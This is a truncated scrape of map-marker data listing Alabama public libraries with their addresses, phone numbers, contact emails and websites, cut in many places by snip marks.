334-7",dscr:"\x3cb\x3eMacon County-Tuskegee Public Library\x3c/b\x3e\x3cbr\x3e302 Main Street\x3cbr\x3eTuskegee, AL 36083-1806\x3cbr\x3e334-727-5192\x3cbr\x3e334-727-5989\x3cbr\x3e\x3ca href=\"mailto:mclark99@bellsouth.net\" target=\"_blank\"\x3emclark99@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.423227,-85.691028\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ion:"\x3cb\x3eHuntsville-Madison County Public Library\x3c/b\x3e\x3cbr\x3e915 Monroe Street\x3cbr\x3eHuntsville, AL 35801-0443\x3cbr\x3e256-532-5950\x3cbr\x3e256-532-5997\x3cbr\x3e\x3ca href=\"mailto:dterry@hpl.lib.al.us\" target=\"_blank\"\x3edterry@hpl.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.hpl.lib.al.us\" target=\"_blank\"\x3ewww.hpl.lib.al.us\x3c/a\x3e",infoWindow:{title:"Huntsville-Madison County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e
...[SNIP]...
scr:"\x3cb\x3eHuntsville-Madison County Public Library\x3c/b\x3e\x3cbr\x3e915 Monroe Street\x3cbr\x3eHuntsville, AL 35801-0443\x3cbr\x3e256-532-5950\x3cbr\x3e256-532-5997\x3cbr\x3e\x3ca href=\"mailto:dterry@hpl.lib.al.us\" target=\"_blank\"\x3edterry@hpl.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.hpl.lib.al.us\" target=\"_blank\"\x3ewww.hpl.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.7227
...[SNIP]...
description:"\x3cb\x3eDemopolis Public Library\x3c/b\x3e\x3cbr\x3e211 East Washington Street\x3cbr\x3eDemopolis, AL 36732-2133\x3cbr\x3e334-289-1595\x3cbr\x3e334-289-8260\x3cbr\x3e\x3ca href=\"mailto:lindsy.gardner@demopolisal.com\" target=\"_blank\"\x3elindsy.gardner@demopolisal.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.westal.net/dpl/\" target=\"_blank\"\x3ehttp://www.westal.net/dpl/\x3c/a\x3e",infoWindow:{title:"Demopolis Public Library",basics:"\x3cdiv transclude=\"iw\"\x
...[SNIP]...
334-2",dscr:"\x3cb\x3eDemopolis Public Library\x3c/b\x3e\x3cbr\x3e211 East Washington Street\x3cbr\x3eDemopolis, AL 36732-2133\x3cbr\x3e334-289-1595\x3cbr\x3e334-289-8260\x3cbr\x3e\x3ca href=\"mailto:lindsy.gardner@demopolisal.com\" target=\"_blank\"\x3elindsy.gardner@demopolisal.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.westal.net/dpl/\" target=\"_blank\"\x3ehttp://www.westal.net/dpl/\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26
...[SNIP]...
Library",description:"\x3cb\x3eMarengo County Public Library\x3c/b\x3e\x3cbr\x3e507 North Main\x3cbr\x3eLinden, AL 36748-0519\x3cbr\x3e334-295-2246\x3cbr\x3e334-295-2247\x3cbr\x3e\x3ca href=\"mailto:marengocounty933@bellsouth.net\" target=\"_blank\"\x3emarengocounty933@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Marengo County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Marengo County Public Library507 North MainLinden, AL 36748-0519334-295-2246334",dscr:"\x3cb\x3eMarengo County Public Library\x3c/b\x3e\x3cbr\x3e507 North Main\x3cbr\x3eLinden, AL 36748-0519\x3cbr\x3e334-295-2246\x3cbr\x3e334-295-2247\x3cbr\x3e\x3ca href=\"mailto:marengocounty933@bellsouth.net\" target=\"_blank\"\x3emarengocounty933@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.310143,-87.797926\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
",description:"\x3cb\x3eMarengo Library System\x3c/b\x3e\x3cbr\x3e211 East Washington Street\x3cbr\x3eDemopolis, AL 36732-2133\x3cbr\x3e334-289-1595\x3cbr\x3e334-289-8260\x3cbr\x3e\x3ca href=\"mailto:robbing@westal.net\" target=\"_blank\"\x3erobbing@westal.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.westal.net/dpl\" target=\"_blank\"\x3ewww.westal.net/dpl\x3c/a\x3e",infoWindow:{title:"Marengo Library System",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",sn
...[SNIP]...
334-289",dscr:"\x3cb\x3eMarengo Library System\x3c/b\x3e\x3cbr\x3e211 East Washington Street\x3cbr\x3eDemopolis, AL 36732-2133\x3cbr\x3e334-289-1595\x3cbr\x3e334-289-8260\x3cbr\x3e\x3ca href=\"mailto:robbing@westal.net\" target=\"_blank\"\x3erobbing@westal.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.westal.net/dpl\" target=\"_blank\"\x3ewww.westal.net/dpl\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.51
...[SNIP]...
Library",description:"\x3cb\x3eClyde Nix Public Library\x3c/b\x3e\x3cbr\x3e350 Bexar Avenue W\x3cbr\x3eHamilton, AL 35570-1944\x3cbr\x3e205-921-4290\x3cbr\x3e205-921-4290\x3cbr\x3e\x3ca href=\"mailto:clydenix@yahoo.com\" target=\"_blank\"\x3eclydenix@yahoo.com\x3c/a\x3e",infoWindow:{title:"Clyde Nix Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Clyde Nix Public Library350 Bexar Avenue WHamilton, AL 35570-1944205-921-429020",dscr:"\x3cb\x3eClyde Nix Public Library\x3c/b\x3e\x3cbr\x3e350 Bexar Avenue W\x3cbr\x3eHamilton, AL 35570-1944\x3cbr\x3e205-921-4290\x3cbr\x3e205-921-4290\x3cbr\x3e\x3ca href=\"mailto:clydenix@yahoo.com\" target=\"_blank\"\x3eclydenix@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.143256,-87.992203\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Library",description:"\x3cb\x3eNorthwest Regional Library\x3c/b\x3e\x3cbr\x3e185 Ashwood Drive\x3cbr\x3eWinfield, AL 35594-1527\x3cbr\x3e205-487-2330\x3cbr\x3e20-487-4815\x3cbr\x3e\x3ca href=\"mailto:nwrl@dlis.net\" target=\"_blank\"\x3enwrl@dlis.net\x3c/a\x3e",infoWindow:{title:"Northwest Regional Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Northwest Regional Library185 Ashwood DriveWinfield, AL 35594-1527205-487-23302",dscr:"\x3cb\x3eNorthwest Regional Library\x3c/b\x3e\x3cbr\x3e185 Ashwood Drive\x3cbr\x3eWinfield, AL 35594-1527\x3cbr\x3e205-487-2330\x3cbr\x3e20-487-4815\x3cbr\x3e\x3ca href=\"mailto:nwrl@dlis.net\" target=\"_blank\"\x3enwrl@dlis.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.932463,-87.815109\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
c Library",description:"\x3cb\x3eWinfield Public Library\x3c/b\x3e\x3cbr\x3e185 Ashwood Drive\x3cbr\x3eWinfield, AL 35594-0688\x3cbr\x3e205-487-2484\x3cbr\x3e205-487-5146\x3cbr\x3e\x3ca href=\"mailto:wpl@dlis.net\" target=\"_blank\"\x3ewpl@dlis.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.winfieldcity.org/library.htm\" target=\"_blank\"\x3ehttp://www.winfieldcity.org/library.htm\x3c/a\x3e",infoWindow:{title:"Winfield Public Library",basics:"\x
...[SNIP]...
205-487-2484205-",dscr:"\x3cb\x3eWinfield Public Library\x3c/b\x3e\x3cbr\x3e185 Ashwood Drive\x3cbr\x3eWinfield, AL 35594-0688\x3cbr\x3e205-487-2484\x3cbr\x3e205-487-5146\x3cbr\x3e\x3ca href=\"mailto:wpl@dlis.net\" target=\"_blank\"\x3ewpl@dlis.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.winfieldcity.org/library.htm\" target=\"_blank\"\x3ehttp://www.winfieldcity.org/library.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?ou
...[SNIP]...
ry",description:"\x3cb\x3eAlbertville Public Library\x3c/b\x3e\x3cbr\x3e200 Jackson Street\x3cbr\x3eAlbertville, AL 35950-0430\x3cbr\x3e256-891-8290\x3cbr\x3e256-891-8295\x3cbr\x3e\x3ca href=\"mailto:lrowell@albertvillelibrary.org\" target=\"_blank\"\x3elrowell@albertvillelibrary.org\x3c/a\x3e",infoWindow:{title:"Albertville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Albertville Public Library200 Jackson StreetAlbertville, AL 35950-0430256-891-8",dscr:"\x3cb\x3eAlbertville Public Library\x3c/b\x3e\x3cbr\x3e200 Jackson Street\x3cbr\x3eAlbertville, AL 35950-0430\x3cbr\x3e256-891-8290\x3cbr\x3e256-891-8295\x3cbr\x3e\x3ca href=\"mailto:lrowell@albertvillelibrary.org\" target=\"_blank\"\x3elrowell@albertvillelibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.264403,-86.202986\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ab Public Library",description:"\x3cb\x3eArab Public Library\x3c/b\x3e\x3cbr\x3e325 2nd Street NW\x3cbr\x3eArab, AL 35016-1346\x3cbr\x3e256-586-3366\x3cbr\x3e256-586-5638\x3cbr\x3e\x3ca href=\"mailto:library@arabcity.org\" target=\"_blank\"\x3elibrary@arabcity.org\x3c/a\x3e",infoWindow:{title:"Arab Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Arab Public Library325 2nd Street NWArab, AL 35016-1346256-586-3366256-586-5638",dscr:"\x3cb\x3eArab Public Library\x3c/b\x3e\x3cbr\x3e325 2nd Street NW\x3cbr\x3eArab, AL 35016-1346\x3cbr\x3e256-586-3366\x3cbr\x3e256-586-5638\x3cbr\x3e\x3ca href=\"mailto:library@arabcity.org\" target=\"_blank\"\x3elibrary@arabcity.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.320962,-86.496803\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Boaz Public Library",description:"\x3cb\x3eBoaz Public Library\x3c/b\x3e\x3cbr\x3e205 Main Street\x3cbr\x3eBoaz, AL 35957-2026\x3cbr\x3e256-593-8056\x3cbr\x3e256-593-8056\x3cbr\x3e\x3ca href=\"mailto:library@cityofboaz.org\" target=\"_blank\"\x3elibrary@cityofboaz.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cityofboaz.org/library\" target=\"_blank\"\x3ehttp://www.cityofboaz.org/library\x3c/a\x3e",infoWindow:{title:"Boaz Public Library",basics:"\x3cdiv transclude
...[SNIP]...
256-593-8056256-593-8056li",dscr:"\x3cb\x3eBoaz Public Library\x3c/b\x3e\x3cbr\x3e205 Main Street\x3cbr\x3eBoaz, AL 35957-2026\x3cbr\x3e256-593-8056\x3cbr\x3e256-593-8056\x3cbr\x3e\x3ca href=\"mailto:library@cityofboaz.org\" target=\"_blank\"\x3elibrary@cityofboaz.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cityofboaz.org/library\" target=\"_blank\"\x3ehttp://www.cityofboaz.org/library\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbna
...[SNIP]...
t Public Library",description:"\x3cb\x3eGrant Public Library\x3c/b\x3e\x3cbr\x3e5379 Main Street\x3cbr\x3eGrant, AL 35747-0401\x3cbr\x3e256-728-5128\x3cbr\x3e256-571-7596\x3cbr\x3e\x3ca href=\"mailto:readme@nehp.net\" target=\"_blank\"\x3ereadme@nehp.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://users.nehp.net/readme/\" target=\"_blank\"\x3ehttp://users.nehp.net/readme/\x3c/a\x3e",infoWindow:{title:"Grant Public Library",basics:"\x3cdiv transclude=\"iw\"
...[SNIP]...
256-728-5128256-571-759",dscr:"\x3cb\x3eGrant Public Library\x3c/b\x3e\x3cbr\x3e5379 Main Street\x3cbr\x3eGrant, AL 35747-0401\x3cbr\x3e256-728-5128\x3cbr\x3e256-571-7596\x3cbr\x3e\x3ca href=\"mailto:readme@nehp.net\" target=\"_blank\"\x3ereadme@nehp.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://users.nehp.net/readme/\" target=\"_blank\"\x3ehttp://users.nehp.net/readme/\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=
...[SNIP]...
,description:"\x3cb\x3eGuntersville Public Library\x3c/b\x3e\x3cbr\x3e1240 O\"Brig Avenue\x3cbr\x3eGuntersville, AL 35976-1431\x3cbr\x3e256-571-7595\x3cbr\x3e256-571-7596\x3cbr\x3e\x3ca href=\"mailto:joanne1@guntersvillelibrary.org\" target=\"_blank\"\x3ejoanne1@guntersvillelibrary.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://guntersvillelibrary.org\" target=\"_blank\"\x3ehttp://guntersvillelibrary.org\x3c/a\x3e",infoWindow:{title:"Guntersville Public Library",basics:"\x3cdiv transclu
...[SNIP]...
56-571",dscr:"\x3cb\x3eGuntersville Public Library\x3c/b\x3e\x3cbr\x3e1240 O\"Brig Avenue\x3cbr\x3eGuntersville, AL 35976-1431\x3cbr\x3e256-571-7595\x3cbr\x3e256-571-7596\x3cbr\x3e\x3ca href=\"mailto:joanne1@guntersvillelibrary.org\" target=\"_blank\"\x3ejoanne1@guntersvillelibrary.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://guntersvillelibrary.org\" target=\"_blank\"\x3ehttp://guntersvillelibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
erative Library",description:"\x3cb\x3eMarshall County Cooperative Library\x3c/b\x3e\x3cbr\x3e275 Gunter Avenue\x3cbr\x3eGuntersville, AL 35976-7023\x3cbr\x3e256-582-2973\x3cbr\x3e\x3ca href=\"mailto:marcolib@charterinternet.net\" target=\"_blank\"\x3emarcolib@charterinternet.net\x3c/a\x3e",infoWindow:{title:"Marshall County Cooperative Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Marshall County Cooperative Library275 Gunter AvenueGuntersville, AL 35976-7023",dscr:"\x3cb\x3eMarshall County Cooperative Library\x3c/b\x3e\x3cbr\x3e275 Gunter Avenue\x3cbr\x3eGuntersville, AL 35976-7023\x3cbr\x3e256-582-2973\x3cbr\x3e\x3ca href=\"mailto:marcolib@charterinternet.net\" target=\"_blank\"\x3emarcolib@charterinternet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.362104,-86.291591\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ary",description:"\x3cb\x3eCitronelle Memorial Library\x3c/b\x3e\x3cbr\x3e7855 State Street\x3cbr\x3eCitronelle, AL 36522-2450\x3cbr\x3e251-866-7319\x3cbr\x3e251-866-5210\x3cbr\x3e\x3ca href=\"mailto:clib4@yahoo.com\" target=\"_blank\"\x3eclib4@yahoo.com\x3c/a\x3e",infoWindow:{title:"Citronelle Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Citronelle Memorial Library7855 State StreetCitronelle, AL 36522-2450251-866-73",dscr:"\x3cb\x3eCitronelle Memorial Library\x3c/b\x3e\x3cbr\x3e7855 State Street\x3cbr\x3eCitronelle, AL 36522-2450\x3cbr\x3e251-866-7319\x3cbr\x3e251-866-5210\x3cbr\x3e\x3ca href=\"mailto:clib4@yahoo.com\" target=\"_blank\"\x3eclib4@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.090806,-88.228901\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
cription:"\x3cb\x3eIna Pullen Smallwood Memorial Library\x3c/b\x3e\x3cbr\x3e224 Grant Street\x3cbr\x3eChickasaw, AL 36671-0449\x3cbr\x3e251-452-6465\x3cbr\x3e251-208-7571\x3cbr\x3e\x3ca href=\"mailto:swatts@mplonline.org\" target=\"_blank\"\x3eswatts@mplonline.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.mplonline.org\" target=\"_blank\"\x3ewww.mplonline.org\x3c/a\x3e",infoWindow:{title:"Ina Pullen Smallwood Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3
...[SNIP]...
25",dscr:"\x3cb\x3eIna Pullen Smallwood Memorial Library\x3c/b\x3e\x3cbr\x3e224 Grant Street\x3cbr\x3eChickasaw, AL 36671-0449\x3cbr\x3e251-452-6465\x3cbr\x3e251-208-7571\x3cbr\x3e\x3ca href=\"mailto:swatts@mplonline.org\" target=\"_blank\"\x3eswatts@mplonline.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.mplonline.org\" target=\"_blank\"\x3ewww.mplonline.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.7648
...[SNIP]...
ibrary",description:"\x3cb\x3eMose Hudson Tapia Public Library\x3c/b\x3e\x3cbr\x3e13885 South Wintzell Avenue\x3cbr\x3eBayou La Batre, AL 36509-2415\x3cbr\x3e251-824-4213\x3cbr\x3e\x3ca href=\"mailto:tapialibrary@yahoo.com\" target=\"_blank\"\x3etapialibrary@yahoo.com\x3c/a\x3e",infoWindow:{title:"Mose Hudson Tapia Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mose Hudson Tapia Public Library13885 South Wintzell AvenueBayou La Batre, AL 3",dscr:"\x3cb\x3eMose Hudson Tapia Public Library\x3c/b\x3e\x3cbr\x3e13885 South Wintzell Avenue\x3cbr\x3eBayou La Batre, AL 36509-2415\x3cbr\x3e251-824-4213\x3cbr\x3e\x3ca href=\"mailto:tapialibrary@yahoo.com\" target=\"_blank\"\x3etapialibrary@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.404710,-88.247549\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Library",description:"\x3cb\x3eMount Vernon Public Library\x3c/b\x3e\x3cbr\x3e1220 Military Road\x3cbr\x3eMt Vernon, AL 36560\x3cbr\x3e251-829-9497\x3cbr\x3e251-829-5546\x3cbr\x3e\x3ca href=\"mailto:mtvernonlibrary@yahoo.com\" target=\"_blank\"\x3emtvernonlibrary@yahoo.com\x3c/a\x3e",infoWindow:{title:"Mount Vernon Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mount Vernon Public Library1220 Military RoadMt Vernon, AL 36560251-829-9497251",dscr:"\x3cb\x3eMount Vernon Public Library\x3c/b\x3e\x3cbr\x3e1220 Military Road\x3cbr\x3eMt Vernon, AL 36560\x3cbr\x3e251-829-9497\x3cbr\x3e251-829-5546\x3cbr\x3e\x3ca href=\"mailto:mtvernonlibrary@yahoo.com\" target=\"_blank\"\x3emtvernonlibrary@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.086026,-88.012949\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
rary",description:"\x3cb\x3ePrichard Public Library\x3c/b\x3e\x3cbr\x3e300 Lovejoy Loop West \x3cbr\x3ePrichard, AL 36610-3952\x3cbr\x3e251-452-7847\x3cbr\x3e251-452-7935\x3cbr\x3e\x3ca href=\"mailto:ppl_2001us@yahoo.com\" target=\"_blank\"\x3eppl_2001us@yahoo.com\x3c/a\x3e",infoWindow:{title:"Prichard Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Prichard Public Library300 Lovejoy Loop West Prichard, AL 36610-3952251-452-784",dscr:"\x3cb\x3ePrichard Public Library\x3c/b\x3e\x3cbr\x3e300 Lovejoy Loop West \x3cbr\x3ePrichard, AL 36610-3952\x3cbr\x3e251-452-7847\x3cbr\x3e251-452-7935\x3cbr\x3e\x3ca href=\"mailto:ppl_2001us@yahoo.com\" target=\"_blank\"\x3eppl_2001us@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.731650,-88.083893\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
c Library",description:"\x3cb\x3eSatsuma Public Library\x3c/b\x3e\x3cbr\x3e5466 Old Highway 43\x3cbr\x3eSatsuma, AL 36572-0579\x3cbr\x3e251-679-0700\x3cbr\x3e251-379-4993\x3cbr\x3e\x3ca href=\"mailto:splibdir@bellsouth.net \" target=\"_blank\"\x3esplibdir@bellsouth.net \x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cityofsatsuma.com/Library.html\" target=\"_blank\"\x3ehttp://www.cityofsatsuma.com/Library.html\x3c/a\x3e",infoWindow:{title:"Satsuma Public Library",basics
...[SNIP]...
251-679-0700251-",dscr:"\x3cb\x3eSatsuma Public Library\x3c/b\x3e\x3cbr\x3e5466 Old Highway 43\x3cbr\x3eSatsuma, AL 36572-0579\x3cbr\x3e251-679-0700\x3cbr\x3e251-379-4993\x3cbr\x3e\x3ca href=\"mailto:splibdir@bellsouth.net \" target=\"_blank\"\x3esplibdir@bellsouth.net \x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cityofsatsuma.com/Library.html\" target=\"_blank\"\x3ehttp://www.cityofsatsuma.com/Library.html\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/c
...[SNIP]...
,description:"\x3cb\x3eMonroe County Public Library\x3c/b\x3e\x3cbr\x3e121 Pineville Road \x3cbr\x3eMonroeville, AL 36460-1899\x3cbr\x3e251-743-3818\x3cbr\x3e251-575-7357\x3cbr\x3e\x3ca href=\"mailto:monroli2@frontiernet.net\" target=\"_blank\"\x3emonroli2@frontiernet.net\x3c/a\x3e",infoWindow:{title:"Monroe County Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Monroe County Public Library121 Pineville Road Monroeville, AL 36460-1899251-74",dscr:"\x3cb\x3eMonroe County Public Library\x3c/b\x3e\x3cbr\x3e121 Pineville Road \x3cbr\x3eMonroeville, AL 36460-1899\x3cbr\x3e251-743-3818\x3cbr\x3e251-575-7357\x3cbr\x3e\x3ca href=\"mailto:monroli2@frontiernet.net\" target=\"_blank\"\x3emonroli2@frontiernet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.527982,-87.323429\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ption:"\x3cb\x3eJuliette Hampton Morgan Memorial Library\x3c/b\x3e\x3cbr\x3e245 High Street\x3cbr\x3eMontgomery, AL 36102-1950\x3cbr\x3e334-240-4300\x3cbr\x3e334-240-4977\x3cbr\x3e\x3ca href=\"mailto:jowes@mccpl.lib.al.us\" target=\"_blank\"\x3ejowes@mccpl.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.mccpl.lib.al.us\" target=\"_blank\"\x3ehttp://www.mccpl.lib.al.us\x3c/a\x3e",infoWindow:{title:"Juliette Hampton Morgan Memorial Library",basics:"\x3cdiv tra
...[SNIP]...
,dscr:"\x3cb\x3eJuliette Hampton Morgan Memorial Library\x3c/b\x3e\x3cbr\x3e245 High Street\x3cbr\x3eMontgomery, AL 36102-1950\x3cbr\x3e334-240-4300\x3cbr\x3e334-240-4977\x3cbr\x3e\x3ca href=\"mailto:jowes@mccpl.lib.al.us\" target=\"_blank\"\x3ejowes@mccpl.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.mccpl.lib.al.us\" target=\"_blank\"\x3ehttp://www.mccpl.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26
...[SNIP]...
Library",description:"\x3cb\x3eDecatur Public Library\x3c/b\x3e\x3cbr\x3e504 Cherry Street NE\x3cbr\x3eDecatur, AL 35602-1766\x3cbr\x3e256-353-2993\x3cbr\x3e256-350-6736\x3cbr\x3e\x3ca href=\"mailto:wheelerbasin@prodigy.net\" target=\"_blank\"\x3ewheelerbasin@prodigy.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.decatur.lib.al.us\" target=\"_blank\"\x3ehttp://www.decatur.lib.al.us\x3c/a\x3e",infoWindow:{title:"Decatur Public Library",basics:"\x3cdiv transclude=\"iw\"
...[SNIP]...
256-353-2993256",dscr:"\x3cb\x3eDecatur Public Library\x3c/b\x3e\x3cbr\x3e504 Cherry Street NE\x3cbr\x3eDecatur, AL 35602-1766\x3cbr\x3e256-353-2993\x3cbr\x3e256-350-6736\x3cbr\x3e\x3ca href=\"mailto:wheelerbasin@prodigy.net\" target=\"_blank\"\x3ewheelerbasin@prodigy.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.decatur.lib.al.us\" target=\"_blank\"\x3ehttp://www.decatur.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90
...[SNIP]...
brary",description:"\x3cb\x3eWetumpka Public Library\x3c/b\x3e\x3cbr\x3e212 South Main Street\x3cbr\x3eWetumpka, AL 36092-0249\x3cbr\x3e334-567-1308\x3cbr\x3e334-567-1309\x3cbr\x3e\x3ca href=\"mailto:wetumlib@bellsouth.net\" target=\"_blank\"\x3ewetumlib@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.wetumpkalibrary.com\" target=\"_blank\"\x3ewww.wetumpkalibrary.com\x3c/a\x3e",infoWindow:{title:"Wetumpka Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/
...[SNIP]...
334-567-1308",dscr:"\x3cb\x3eWetumpka Public Library\x3c/b\x3e\x3cbr\x3e212 South Main Street\x3cbr\x3eWetumpka, AL 36092-0249\x3cbr\x3e334-567-1308\x3cbr\x3e334-567-1309\x3cbr\x3e\x3ca href=\"mailto:wetumlib@bellsouth.net\" target=\"_blank\"\x3ewetumlib@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.wetumpkalibrary.com\" target=\"_blank\"\x3ewww.wetumpkalibrary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x
...[SNIP]...
Library",description:"\x3cb\x3eAtmore Public Library\x3c/b\x3e\x3cbr\x3e700 East Church Street\x3cbr\x3eAtmore, AL 36502-2694\x3cbr\x3e251-368-5234\x3cbr\x3e251-368-7064\x3cbr\x3e\x3ca href=\"mailto:library5@frontiernet.net\" target=\"_blank\"\x3elibrary5@frontiernet.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.atmorelibrary.com\" target=\"_blank\"\x3ehttp://www.atmorelibrary.com\x3c/a\x3e",infoWindow:{title:"Atmore Public Library",basics:"\x3cdiv transclude=\"iw\"\
...[SNIP]...
251-368-5234251",dscr:"\x3cb\x3eAtmore Public Library\x3c/b\x3e\x3cbr\x3e700 East Church Street\x3cbr\x3eAtmore, AL 36502-2694\x3cbr\x3e251-368-5234\x3cbr\x3e251-368-7064\x3cbr\x3e\x3ca href=\"mailto:library5@frontiernet.net\" target=\"_blank\"\x3elibrary5@frontiernet.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.atmorelibrary.com\" target=\"_blank\"\x3ehttp://www.atmorelibrary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90
...[SNIP]...
